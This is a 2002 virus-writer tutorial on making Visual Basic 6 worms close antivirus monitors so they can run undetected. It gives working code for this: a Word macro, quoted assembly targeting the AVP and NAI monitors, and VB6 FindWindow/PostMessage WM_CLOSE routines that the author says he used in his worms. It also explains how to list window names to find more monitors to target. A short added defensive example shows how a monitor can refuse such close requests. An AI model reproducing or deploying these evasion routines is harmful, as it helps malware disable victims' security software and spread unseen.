When the going gets weird the weird turn pro

Strange Article - Turning off av monitors in Visual Basic 6 by alcopaul

You planned to write a worm in Visual Basic 6, attached the Melissa code to your project, added some personalized payload and compiled your code...
Then a message from your antivirus software pops up...

"File 1 is a New Worm"

Shitty... Almost all the worms that I made went through this morbid reality...
To keep my coding smooth, I had to turn off my av whenever I compiled and alpha-tested my project...
Then an idea suddenly popped up.. Wouldn't it be cooler if my worm could turn off an av monitor and do its thing without detection?
I researched...

I saw an article by LiteSYS/XAKER in Coderz #2 regarding turning off av monitors in VB...
The routine uses MS-Word... Here's the sample used in the article..

-------------------------
Sub nohaybillete()
On Error Resume Next

For I = 1 to Tasks.Count
If ( Tasks.Item(I).Name = "AVP Monitor" ) Then Tasks.Item(I).Close
Next

End Sub
-------------------------

This, when run in the MS-Word VB Editor, will produce our desired result...
It will close the running AVP monitor and voila, the computer is "clean"..
But we want the routine attached to a VB executable...
And what if the infected computer doesn't have MS Office... LiteSYS/XAKER provided an option...

Quoted:

"There's another method... what about dropping a simple executable
(written in assembly ofcoz) that can use directly the FindWindowA and PostMessageA APIs?
Fully compatible with every windoze version and you don't have to rely on that untrustworthy Word object...

I must thank Benny/29A for his AV monitor deactivation tute that appeared in 29A #4, because it was my inspiration to do this...

Ok, you must use your Debug script or your Chr stuff to write to the file. Look at the assembly code first, it kills both AVP and NAI:

--------------------------------
.386
.MODEL FLAT, STDCALL
LOCALS
JUMPS

EXTRN ExitProcess:PROC
EXTRN FindWindowA:PROC
EXTRN PostMessageA:PROC

.DATA
DD ?
.CODE

RETRO:
MOV EAX, OFFSET Titulo_NAI
CALL MATA_MONI

MOV EAX, OFFSET Titulo_AVP
CALL MATA_MONI
 
 
PUSH 0
CALL ExitProcess

Titulo_AVP db "AVP Monitor", 00h
Titulo_NAI db "NAI_VS_STAT", 00h

MATA_MONI PROC NEAR

PUSH EAX
PUSH 0
CALL FindWindowA
JNZ SI_MATARAS

RET

SI_MATARAS:
PUSH 0
PUSH 0
PUSH 12h
PUSH EAX
CALL PostMessageA

RET
MATA_MONI ENDP

END RETRO
--------------------------------

Assemble, link it and create your script or your Chrs...
I don't like the debug script idea because it's too slooooow so I prefer to put it in your virus/worm and you're all set, look at this example:

--------------------------------
"

Self-explanatory...
This routine eats a lot of disk space and is not efficient when executed, meaning it will be a slow routine..
LiteSYS/XAKER accepted this reality..

Quoted:

"This is not a fast and stealthy way, so it's better to use some Chrs in your code instead of the debug script to do it,
but I am too lazy to write some code so you may find the way..."

I researched the FindWindowA and PostMessageA APIs.. and referred to my API Text Viewer..

--------------------------------------------------------

    Private Declare Function FindWindow Lib "user32" _
      Alias "FindWindowA" _
      (ByVal lpClassName As String, _
      ByVal lpWindowName As String) As Long

    Private Declare Function PostMessage Lib "user32" _
      Alias "PostMessageA" _
      (ByVal hwnd As Long, _
      ByVal wMsg As Long, _
      ByVal wParam As Long, _
      ByVal lParam As Long) As Long

    Const WM_CLOSE = &H10   ' <---- important constant

----------------------------------------------------------

Then I encountered an article from Microsoft...

"HOWTO: Programmatically close a separate Application (Q176391)"

Hehehehehe... Now let's concentrate....

Description of the useful APIs from the article..

"To programmatically close a single instance of a Windows program, you begin by getting the handle to the Window that you want to close with the FindWindow function.
The FindWindow API function returns the handle of a top-level window whose class name and window name matches the string parameters.
This function returns the handle of the window as a long value if it is successful and a null if it fails. To use this function, you must supply two parameters:

lpClassName - A pointer to a null-terminated string that specifies the class name or is an atom that identifies the class-name string.
In this application, you can pass vbNullString.

lpWindowName - A pointer to a null-terminated string that specifies the window name (the window's title).

Use the handle to send a message to close the window with the PostMessage API.
The PostMessage API function sends a message to an application message queue and returns a value immediately.
This function returns a non-zero value if the function is successful and zero if the function fails. To use this function, you must specify four parameters:

hWnd - The handle of the window you want to close. This long value is available as the result of the FindWindow function.

uInt - The message to post to the message queue. In this application, you would use the WM_CLOSE message.

wParam - The first message parameter. For this message, you should pass a null value.

lParam - The second message parameter. For this message, you should pass a null value. "

Let us convert the description to code...

-------------------------------------------------
Option Explicit
Private Declare Function FindWindow Lib "user32" _
     Alias "FindWindowA" _
     (ByVal lpClassName As String, _
     ByVal lpWindowName As String) As Long

Private Declare Function PostMessage Lib "user32" _
     Alias "PostMessageA" _
     (ByVal hwnd As Long, _
     ByVal wMsg As Long, _
     ByVal wParam As Long, _
     ByVal lParam As Long) As Long

Const WM_CLOSE = &H10
Dim a As Long
Dim b As Long

-------------------------------
add-ons
Dim c As Long
Dim d As Long
....
-------------------------------

a = FindWindow(vbNullString, "AVP Monitor")
b = PostMessage(a, WM_CLOSE, vbNull, vbNull)

-------------------------------
add-ons
c = FindWindow(vbNullString, "monitor name")
d = PostMessage(c, WM_CLOSE, vbNull, vbNull)
....
--------------------------------------------------

This is short but powerful code...
When attached to a VB project and run, it will programmatically close the AVP monitor (when you have one running on your pc)... :)
This code was used by almost all the worms that I've produced.. (from the AVP-tagged Alcaul to ....)...
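From the other side of the fence, here is an added example (my own, not from the article or from any AV product) of how a VB6 resident-monitor form can refuse the WM_CLOSE that this routine posts; it assumes a form that exposes a Public Sub Shutdown which the program's own code calls for a legitimate exit.

```vb
' Added example, not from the article: a resident-monitor form that does not
' die on a WM_CLOSE posted by another process via FindWindow/PostMessage.
' VB raises Form_QueryUnload for a posted WM_CLOSE with UnloadMode =
' vbFormControlMenu, the same value as the user clicking the X button, so the
' form cannot tell the two apart and must treat both as "not a real shutdown".
Option Explicit

' Set only by our own Shutdown path; an external WM_CLOSE never sets it.
Private m_Shutdown As Boolean

' Assumed legitimate exit routine, called by the program's own code.
Public Sub Shutdown()
    m_Shutdown = True
    Unload Me          ' arrives in QueryUnload with UnloadMode = vbFormCode
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
    Select Case UnloadMode
        Case vbFormCode
            ' Unload statement from code: allowed only through Shutdown().
            If Not m_Shutdown Then Cancel = True
        Case vbAppWindows
            ' Windows is logging off or shutting down: let the form go.
        Case Else
            ' vbFormControlMenu covers the X button and a WM_CLOSE posted from
            ' outside; vbAppTaskManager is Task Manager's End Task. Refuse,
            ' keep running, and record the attempt in the application log.
            Cancel = True
            App.LogEvent "Refused external close request, UnloadMode=" & UnloadMode
    End Select
End Sub
```

A guard like this covers only WM_CLOSE delivered through the window procedure; a monitor should not rely on its window staying open as its only protection.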

--------------------
Finding our targets
--------------------

So now we know how to close a running window using the code laid out above....
Now we have to find our target av monitors...

Use the MS-Word VB Editor:

--------------
Sub search()
On Error Resume Next
Dim fs, a, I, Windowname
' Create the output file once, before the loop (creating it inside the loop
' overwrote the file on every pass, so only the last name survived)
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("c:\avlist.txt", True)
For I = 1 To Tasks.Count
    Windowname = Tasks.Item(I).Name
    a.WriteLine Windowname
Next
a.Close
End Sub
--------------

When run, this will produce avlist.txt in c:\, which contains the window names of the resident/running programs...

Tip : If you want to identify all the target av monitors, first download trial copies of antivirus software from www.download.com or www.tucows.com or from the av site...
Install one, search for the window name of its monitor, then uninstall it after you have identified the name...
Run only the av software and close all other running apps, including the ones in the systray...
If you don't, you'll get a long list of resident/running apps in avlist.txt..

That's all.... Hope this helps...

alcopaul

1/18/2k2